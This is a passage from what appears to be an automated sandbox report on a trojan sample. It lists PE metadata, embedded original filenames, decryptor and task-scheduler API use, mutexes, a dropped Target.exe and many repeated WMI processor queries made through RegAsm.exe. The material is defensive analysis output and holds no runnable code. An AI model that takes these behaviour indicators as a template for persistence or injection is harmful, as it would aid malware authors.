                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8962A54_2_00007FFD9B8962A5
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8951834_2_00007FFD9B895183
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B970F044_2_00007FFD9B970F04
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B9731704_2_00007FFD9B973170
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B9731214_2_00007FFD9B973121
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA1D3794_2_00007FFD9BA1D379
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA150F24_2_00007FFD9BA150F2
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA14FFB4_2_00007FFD9BA14FFB
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA1F70C4_2_00007FFD9BA1F70C
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA14EFA4_2_00007FFD9BA14EFA
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeCode function: 9_2_00007FFD9B8962A59_2_00007FFD9B8962A5
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeCode function: 9_2_00007FFD9B8951839_2_00007FFD9B895183
                      Source: Target.exe.0.drStatic PE information: No import functions for PE file found
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: No import functions for PE file found
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIazura.dll" vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1682559245.000001FC725F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIazura.dll" vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC106DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1675197443.000001FC00001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIazura.dll" vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1675197443.000001FC00001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681802941.000001FC71D90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000000.1643667569.000001FC700E6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHywjlgj.exe" vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10753000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC103F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIazura.dll" vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeBinary or memory string: OriginalFilenameHywjlgj.exe" vs SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Target.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, Error.csCryptographic APIs: 'CreateDecryptor'
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, Error.csCryptographic APIs: 'CreateDecryptor'
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, Schema.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@8/9@2/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeFile created: C:\Users\user\AppData\Roaming\XsdTypeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\26d19999dcc6916aedeba96cfef5e476
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6524:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\82e85a26f7a113e44c1826
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50wdy5ob.v4u.ps1Jump to behavior
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
